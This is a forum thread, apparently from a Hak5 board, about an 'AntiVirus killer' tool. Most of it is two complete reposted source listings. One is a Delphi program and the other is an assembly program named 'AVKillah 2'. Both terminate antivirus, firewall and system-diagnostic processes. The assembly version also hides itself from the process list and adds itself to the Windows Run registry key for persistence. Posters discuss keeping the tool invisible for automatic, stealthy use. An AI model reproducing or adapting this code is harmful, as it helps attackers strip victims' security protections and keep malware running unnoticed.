Jump to content

AntiVirus killer


moonlit

Recommended Posts

  • Replies 61
  • Created
  • Last Reply

Top Posters In This Topic

Hmm... been doing some thinking, the project will be back online and firing on all cylinders... the source will be around but I'll make it a little more difficult (but by no means impossible) to find...

I'll put the links up again in the next couple of days and I'll even try to get another version ready for when I do ^_^

Link to comment
Share on other sites

MAybe these might help

VorteX

Dec 30 2003, 05:24 PM

compile your own undetected one, here an example in delphi:



CODE

unit Unit1;



interface



uses

 Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,

 Tlhelp32, StdCtrls;



type

 TForm1 = class(TForm)

   GroupBox1: TGroupBox;

   Button1: TButton;

   Button2: TButton;

   Button3: TButton;

   Button4: TButton;

   Button5: TButton;

   Button6: TButton;

   Button7: TButton;

   Button8: TButton;

   Button9: TButton;

   Button10: TButton;

   Button11: TButton;

   Button12: TButton;

   Button13: TButton;

   Button14: TButton;

   Button15: TButton;

   GroupBox2: TGroupBox;

   Button16: TButton;

   Button17: TButton;

   procedure Button1Click(Sender: TObject);

   procedure Button2Click(Sender: TObject);

   procedure Button3Click(Sender: TObject);

   procedure Button4Click(Sender: TObject);

   procedure Button5Click(Sender: TObject);

   procedure Button6Click(Sender: TObject);

   procedure Button7Click(Sender: TObject);

   procedure Button8Click(Sender: TObject);

   procedure Button9Click(Sender: TObject);

   procedure Button10Click(Sender: TObject);

   procedure Button11Click(Sender: TObject);

   procedure Button12Click(Sender: TObject);

   procedure Button13Click(Sender: TObject);

   procedure Button14Click(Sender: TObject);

   procedure Button15Click(Sender: TObject);

   procedure Button16Click(Sender: TObject);

   procedure Button17Click(Sender: TObject);

 private

   { Private declarations }

 public

   { Public declarations }

 end;



var

 Form1: TForm1;



implementation



{$R *.DFM}



function KillTask(ExeFileName: string): integer;

const

 PROCESS_TERMINATE=$0001;  

var

 ContinueLoop: BOOL;

 FSnapshotHandle: THandle;

 FProcessEntry32: TProcessEntry32;  

begin

 result := 0;  



 FSnapshotHandle := CreateToolhelp32Snapshot

                    (TH32CS_SNAPPROCESS, 0);  

 FProcessEntry32.dwSize := Sizeof(FProcessEntry32);

 ContinueLoop := Process32First(FSnapshotHandle,  

                                FProcessEntry32);



 while integer(ContinueLoop) <> 0 do

 begin

   if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) =

        UpperCase(ExeFileName))

    or (UpperCase(FProcessEntry32.szExeFile) =

        UpperCase(ExeFileName))) then

     Result := Integer(TerminateProcess(OpenProcess(

                       PROCESS_TERMINATE, BOOL(0),

                       FProcessEntry32.th32ProcessID), 0));  

   ContinueLoop := Process32Next(FSnapshotHandle,

                                 FProcessEntry32);

 end;  



 CloseHandle(FSnapshotHandle);  

end;





procedure killavp;

 begin

 try

 KillTask ('_AVP32.EXE');

 KillTask ('_AVPCC.EXE');

 KillTask ('_AVPM.EXE');

 KillTask ('AVP32.EXE');

 KillTask ('AVPCC.EXE');

 KillTask ('AVPM.EXE');

 KillTask ('AVP.EXE');

 except Exit; end;

 end;



 procedure killnav;

 begin

 try

 KillTask ('NAVAPW32.EXE');

 KillTask ('NAVW32.EXE');

 except Exit; end;

 end;



 procedure killsophos;

 begin

 try

 KillTask ('ICLOAD95.EXE');

 KillTask ('ICMON.EXE');

 KillTask ('ICSUPP95.EXE');

 KillTask ('ICLOADNT.EXE');

 KillTask ('ICSUPPNT.EXE');

 except Exit; end;

 end;



 procedure killpanda;

 begin

 try

 KillTask ('IFACE.EXE');

 except Exit; end;

 end;



 procedure killants;

 begin

 try

 KillTask ('ANTS.EXE');

 except Exit; end;

 end;



 procedure killantitrojan;

 begin

 try

 KillTask ('Anti-Trojan.exe');

 except Exit; end;

 end;



 procedure killatguard;

 begin

 try

 KillTask ('iamapp.exe');

 KillTask ('iamserv.exe');

 except;

 exit;

 end;

 end;



procedure killconseal;

 begin

  try

  KillTask ('FRW.EXE');

  except;

  exit;

  end;

  end;



procedure killblackice;

 begin

 try

  KillTask ('blackice.exe');

  KillTask ('blackd.exe');

  except;

  exit;

  end;

  end;



 procedure killzonealarm;

 begin

 try

  KillTask ('zonealarm.exe');

  KillTask ('vsmon.exe');

  except;

  exit;

  end;

  end;



 procedure killwinroute;

 begin

 try

  KillTask ('WrCtrl.exe');

  KillTask ('WrAdmin.exe');

  KillTask ('WrCtrl.exe');

  except;

  exit;

  end;

  end;



procedure killcleaner;

 begin

  try

  KillTask ('cleaner3.exe');

  KillTask ('cleaner.exe');

  KillTask ('tca.exe');

  KillTask ('MooLive.exe');

  except;

  exit;

  end;

  end;





  procedure killlockdown;

  begin

  try

  KillTask ('lockdown2000.exe');

  except;

  exit;

  end;

  end;



  procedure killsphinx;

  begin

  try

  KillTask ('Sphinx.exe');

  except;

  exit;

  end;

  end;



  procedure killmcafee;

  begin

  try

  KillTask ('VSHWIN32.EXE');

  KillTask ('VSECOMR.EXE');

  KillTask ('WEBSCANX.EXE');

  KillTask ('AVCONSOL.EXE');

  KillTask  ('VSSTAT.EXE');

  except;

  exit;

  end;

  end;





procedure TForm1.Button1Click(Sender: TObject);

begin

killavp;

end;



procedure TForm1.Button2Click(Sender: TObject);

begin

killnav;

end;



procedure TForm1.Button3Click(Sender: TObject);

begin

killsophos;

end;



procedure TForm1.Button4Click(Sender: TObject);

begin

killpanda;

end;



procedure TForm1.Button5Click(Sender: TObject);

begin

killants;

end;



procedure TForm1.Button6Click(Sender: TObject);

begin

killantitrojan;

end;



procedure TForm1.Button7Click(Sender: TObject);

begin

killatguard;

end;



procedure TForm1.Button8Click(Sender: TObject);

begin

killconseal;

end;



procedure TForm1.Button9Click(Sender: TObject);

begin

killblackice;

end;



procedure TForm1.Button10Click(Sender: TObject);

begin

killzonealarm;

end;



procedure TForm1.Button11Click(Sender: TObject);

begin

killwinroute;

end;



procedure TForm1.Button12Click(Sender: TObject);

begin

killcleaner;

end;



procedure TForm1.Button13Click(Sender: TObject);

begin

killlockdown;

end;



procedure TForm1.Button14Click(Sender: TObject);

begin

killsphinx;

end;



procedure TForm1.Button15Click(Sender: TObject);

begin

killmcafee;

end;



procedure TForm1.Button16Click(Sender: TObject);

begin

killmcafee;

sleep(1000);

killsphinx;

sleep(1000);

killlockdown;

sleep(1000);

killcleaner;

sleep(1000);

killwinroute;

sleep(1000);

killzonealarm;

sleep(1000);

killblackice;

sleep(1000);

killconseal;

sleep(1000);

killatguard;

sleep(1000);

killantitrojan;

sleep(1000);

killants;

sleep(1000);

killsophos;

sleep(1000);

killnav;

sleep(1000);

killavp;

end;



procedure TForm1.Button17Click(Sender: TObject);

begin

showmessage('This program is designed to kill all the listed antivirus and firewall programs, you can kill each individually or all together! enjoy');

end;



end.

VorteX

Dec 30 2003, 05:27 PM

or one in asm:

CODE

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

; AVKillah 2 by Phr0stic

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

.386

.model flat, stdcall

option casemap:none

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

include masm32includekernel32.inc

includelib masm32libkernel32.lib

include masm32includeadvapi32.inc

includelib masm32libadvapi32.lib

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

  getfile proto :dword,:dword

  FindMe proto :dword

  pe32 struct

     dwSize dword ?

     cntUsage dword ?

     ID dword ?

     th32DefaultHeapID dword ?

     th32ModuleID dword ?

     cntThreads dword ?

     th32ParentProcessID dword ?

     pcPriClassBase dword ?

     dwFlags dword ?

     szExe db 260 dup(?)

  pe32 ends

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

.const

  sz000 db "regedit.exe",0

  sz001 db "netstat.exe",0

  sz002 db "tracert.exe",0

  sz003 db "msconfig.exe",0

  sz004 db "sysedit.exe",0

  sz005 db "zapro.exe",0

  sz006 db "zonealarm.exe",0

  sz007 db "zatutor.exe",0

  sz008 db "zauinst.exe",0

  sz009 db "minilog.exe",0

  sz010 db "vsmon.exe",0

  sz011 db "navapw32.exe",0

  sz012 db "lockdown.exe",0

  sz013 db "ants.exe",0

  sz014 db "fast.exe",0

  sz015 db "guard.exe",0

  sz016 db "update.exe",0

  sz017 db "autoupdate.exe",0

  sz018 db "tc.exe",0

  sz019 db "spyxx.exe",0

  sz020 db "clean.exe",0

  sz021 db "pview95.exe",0

  sz022 db "drwatson.exe",0

  sz023 db "sfc.exe",0

  sz024 db "msinfo32.exe",0

  sz025 db "nsched32.exe",0

  sz026 db "cleaner.exe",0

  sz027 db "lsetup.exe",0

  sz028 db "aupdate.exe",0

  sz029 db "luall.exe",0

  sz030 db "lucomserver.exe",0

  sz031 db "luinit.exe",0

  sz032 db "navw32.exe",0

  sz033 db "navstub.exe",0

  sz034 db "bootwarn.exe",0

  sz035 db "qconsole.exe",0

  sz036 db "qserver.exe",0

  sz037 db "navdx.exe",0

  sz038 db "undoboot.exe",0

  sz039 db "cfgwiz.exe",0

  sz040 db "moolive.exe",0

  sz041 db "tca.exe",0

  sz042 db "tcm.exe",0

  sz043 db "tds-3.exe",0

  sz044 db "ss3edit.exe",0

  sz045 db "update.exe",0

  sz046 db "anti-trojan.exe",0

  sz047 db "atcon.exe",0

  sz048 db "atupdater.exe",0

  sz049 db "atwatch.exe",0

  sz050 db "wgfe95.exe",0

  sz051 db "poproxy.exe",0

  sz052 db "nprotect.exe",0

  sz053 db "vsstat.exe",0

  sz054 db "vshwin32.exe",0

  sz055 db "ndd32.exe",0

  sz056 db "mcagent.exe",0

  sz057 db "mcupdate.exe",0

  sz058 db "avpcc.exe",0

  sz059 db "avpm.exe",0

  sz060 db "watchdog.exe",0

  sz061 db "taumon.exe",0

  sz062 db "iamapp.exe",0

  sz063 db "iamserv.exe",0

  sz064 db "lockdown2000.exe",0

  sz065 db "sphinx.exe",0

  sz066 db "avconsol.exe",0

  sz067 db "webscanx.exe",0

  sz068 db "vsecomr.exe",0

  sz069 db "_avp32.exe",0

  sz070 db "_avpcc.exe",0

  sz071 db "_avpm.exe",0

  sz072 db "avp32.exe",0

  sz073 db "avpcc.exe",0

  sz074 db "avp.exe",0

  sz075 db "pcciomon.exe",0

  sz076 db "icload95.exe",0

  sz077 db "icmon.exe",0

  sz078 db "icsupp95.exe",0

  sz079 db "icloadnt.exe",0

  sz080 db "icsuppnt.exe",0

  sz081 db "frw.exe",0

  sz082 db "firewall.exe",0

  sz083 db "antivirus.exe",0

  sz084 db "blackice.exe",0

  sz085 db "blackd.exe",0

  sz086 db "wrctrl.exe",0

  sz087 db "wradmin.exe",0

  sz088 db "cleaner3.exe",0

  sz089 db "pcfwallicon.exe",0

  sz090 db "aplica32.exe",0

  sz091 db "cfiadmin.exe",0

  sz092 db "cfiaudit.exe",0

  sz093 db "cfinet32.exe",0

  sz094 db "cfinet.exe",0

  sz095 db "tds2-98.exe",0

  sz096 db "tds2-nt.exe",0

  sz097 db "safeweb.exe",0

  sz098 db "nvarch16.exe",0

  sz099 db "vsmain.exe",0

  sz100 db "persfw.exe",0

  sz101 db "avsynmgr.exe",0

  sz102 db "pavproxy.exe",0

  sz103 db "mssmmc32.exe",0

  sz104 db "trjscan.exe",0

  sz105 db "defwatch.exe",0

  sz106 db "vpc42.exe",0

  sz107 db "rtvscn95.exe",0

  sz108 db "vptray.exe",0

  sz109 db "mgui.exe",0

  sz110 db "apvxdwin.exe",0

  sz111 db "fsav.exe",0

  sz112 db "agentsvr.exe",0

  sz113 db "nmain.exe",0

  sz114 db "nisum.exe",0

  sz115 db "nisserv.exe",0

  sz116 db "taskmon.exe",0

  sz117 db "rrguard.exe",0

  sz118 db "rescue32.exe",0

  sz119 db "rescue.exe",0

  sz120 db "rshell.exe",0

  sz121 db "apimonitor.exe",0

  sz122 db "borg2.exe",0

  sz123 db "W32dsm89.exe",0

  sz124 db "cleanpc.exe",0

  szK32 db "kernel32.dll",0

  szRSP db "RegisterServiceProcess",0

  szRun db "SOFTWAREMicrosoftWindowsCurrentVersionRun",0

  szReg db "SysEnum",0

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

.data?

  hReg dd ?

  szPath db 256 dup(?)

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

.code

start:

invoke GetModuleHandle, addr szK32

INVOKE   GetProcAddress, EAX, ADDR szRSP

test eax, eax

jz addme

push 1

push 0

call eax

addme:

invoke RegOpenKeyEx, 80000002h, addr szRun, 0, 00020000h+0002h+0004h, addr hReg

invoke GetModuleFileName, 0, addr szPath, sizeof szPath

invoke RegSetValueEx, hReg, ADDR szReg, 0, 1, addr szPath, eax

invoke RegCloseKey, hReg

hey:

invoke FindMe, addr sz001

invoke FindMe, addr sz002

invoke FindMe, addr sz003

invoke FindMe, addr sz004

invoke FindMe, addr sz005

invoke FindMe, addr sz006

invoke FindMe, addr sz007

invoke FindMe, addr sz008

invoke FindMe, addr sz009

invoke FindMe, addr sz010

invoke FindMe, addr sz011

invoke FindMe, addr sz012

invoke FindMe, addr sz013

invoke FindMe, addr sz014

invoke FindMe, addr sz015

invoke FindMe, addr sz016

invoke FindMe, addr sz017

invoke FindMe, addr sz018

invoke FindMe, addr sz019

invoke FindMe, addr sz020

invoke FindMe, addr sz021

invoke FindMe, addr sz022

invoke FindMe, addr sz023

invoke FindMe, addr sz024

invoke FindMe, addr sz025

invoke FindMe, addr sz026

invoke FindMe, addr sz027

invoke FindMe, addr sz028

invoke FindMe, addr sz029

invoke FindMe, addr sz030

invoke FindMe, addr sz031

invoke FindMe, addr sz032

invoke FindMe, addr sz033

invoke FindMe, addr sz034

invoke FindMe, addr sz035

invoke FindMe, addr sz036

invoke FindMe, addr sz037

invoke FindMe, addr sz038

invoke FindMe, addr sz039

invoke FindMe, addr sz040

invoke FindMe, addr sz041

invoke FindMe, addr sz042

invoke FindMe, addr sz043

invoke FindMe, addr sz044

invoke FindMe, addr sz045

invoke FindMe, addr sz046

invoke FindMe, addr sz047

invoke FindMe, addr sz048

invoke FindMe, addr sz049

invoke FindMe, addr sz050

invoke FindMe, addr sz051

invoke FindMe, addr sz052

invoke FindMe, addr sz053

invoke FindMe, addr sz054

invoke FindMe, addr sz055

invoke FindMe, addr sz056

invoke FindMe, addr sz057

invoke FindMe, addr sz058

invoke FindMe, addr sz059

invoke FindMe, addr sz060

invoke FindMe, addr sz061

invoke FindMe, addr sz062

invoke FindMe, addr sz063

invoke FindMe, addr sz064

invoke FindMe, addr sz065

invoke FindMe, addr sz066

invoke FindMe, addr sz067

invoke FindMe, addr sz068

invoke FindMe, addr sz069

invoke FindMe, addr sz070

invoke FindMe, addr sz071

invoke FindMe, addr sz072

invoke FindMe, addr sz073

invoke FindMe, addr sz074

invoke FindMe, addr sz075

invoke FindMe, addr sz076

invoke FindMe, addr sz077

invoke FindMe, addr sz078

invoke FindMe, addr sz079

invoke FindMe, addr sz080

invoke FindMe, addr sz081

invoke FindMe, addr sz082

invoke FindMe, addr sz083

invoke FindMe, addr sz084

invoke FindMe, addr sz085

invoke FindMe, addr sz086

invoke FindMe, addr sz087

invoke FindMe, addr sz088

invoke FindMe, addr sz089

invoke FindMe, addr sz090

invoke FindMe, addr sz091

invoke FindMe, addr sz092

invoke FindMe, addr sz093

invoke FindMe, addr sz094

invoke FindMe, addr sz095

invoke FindMe, addr sz096

invoke FindMe, addr sz097

invoke FindMe, addr sz098

invoke FindMe, addr sz099

invoke FindMe, addr sz100

invoke FindMe, addr sz101

invoke FindMe, addr sz102

invoke FindMe, addr sz103

invoke FindMe, addr sz104

invoke FindMe, addr sz105

invoke FindMe, addr sz106

invoke FindMe, addr sz107

invoke FindMe, addr sz108

invoke FindMe, addr sz109

invoke FindMe, addr sz110

invoke FindMe, addr sz111

invoke FindMe, addr sz112

invoke FindMe, addr sz113

invoke FindMe, addr sz114

invoke FindMe, addr sz115

invoke FindMe, addr sz116

invoke FindMe, addr sz117

invoke FindMe, addr sz118

invoke FindMe, addr sz119

invoke FindMe, addr sz120

invoke FindMe, addr sz121

invoke FindMe, addr sz122

invoke FindMe, addr sz123

invoke FindMe, addr sz124

jmp hey

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

FindMe proc szFile:dword

local lpMoop32:pe32

local szBuffer[256]:byte



mov lpMoop32.dwSize, sizeof lpMoop32

invoke CreateToolhelp32Snapshot, 2, 0

mov esi, eax

  lea edi, szFile

invoke Process32First, esi, addr lpMoop32

@@loop:

 invoke getfile, addr lpMoop32.szExe, addr szBuffer

 invoke lstrcmpiA, edi, addr szBuffer

 test eax, eax

 jnz @@continue

     invoke OpenProcess, 0001h, 0, lpMoop32.ID

     invoke TerminateProcess, eax, 0

@@continue:

     invoke Process32Next, esi, addr lpMoop32

 test eax, eax

 jz @@done

     jmp @@loop

@@done:

 invoke CloseHandle, esi

 ret

FindMe endp

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

getfile proc lppath:dword,lpbuffer:dword

push       edi

mov        ecx, lppath

@@:

mov        al, [ecx]

inc          ecx

cmp         al, 0

je            @f

cmp         al, ""

jne          @b

mov        edx, ecx

jmp         @b

@@:

sub         ecx, lppath

add         ecx, edx

mov        edi, lpbuffer

@@:

mov        al, [edx]

inc          edx

mov        [edi], al

inc          edi

cmp         edx, ecx

jne          @b

pop         edi

ret

getfile endp

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

end start

Sorry for the long post. I just thougth it would be more convient to post it here.

They were both found here and as you cna tell the are old.

http://www.governmentsecurity.org/archive/t1731.html

Link to comment
Share on other sites

It's currently not as yet, I've got a lot on atm (teaches me to try and stretch myself, eh?), it'll hopefully be up tonight (tonight GMT) along with the binaries again :)
could ya mail me a link ? i prolly wont b on @ that moment :,(

btw would u mind if i hack the hak5 logo on it ?

P.png

Link to comment
Share on other sites

Nah I'm working on a few things right now and don't really have time to upload right now but I will have it up asap...

Sure, you can put a Hak5 logo in there but you won't see it, the whole thing's invisible ;)

Link to comment
Share on other sites

lol. yeah, having a hak5 logo pop up wouldn't be too stealthy.

Then again, we could have a Hak5 logo pop up and say "Please disable your antivirus".... That might actually work.... AND it would have 100% compatibility with all AV clients!

Link to comment
Share on other sites

lol. yeah, having a hak5 logo pop up wouldn't be too stealthy.

Then again, we could have a Hak5 logo pop up and say "Please disable your antivirus".... That might actually work.... AND it would have 100% compatibility with all AV clients!

Yeah, it might kinda miss the point of it being automatic though ;)

Oh, and DLSS: I see what you mean now, a Hak5 icon... sure!

Link to comment
Share on other sites

This is cool, not even SmartClose will close my NOD32 processess from running so this might be cool, yeh not just on switchblade, I mean I would run this just before a gaming session to make sure all processing power is going to the game not some Antivirus thing that is still running.

Link to comment
Share on other sites

  • 2 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...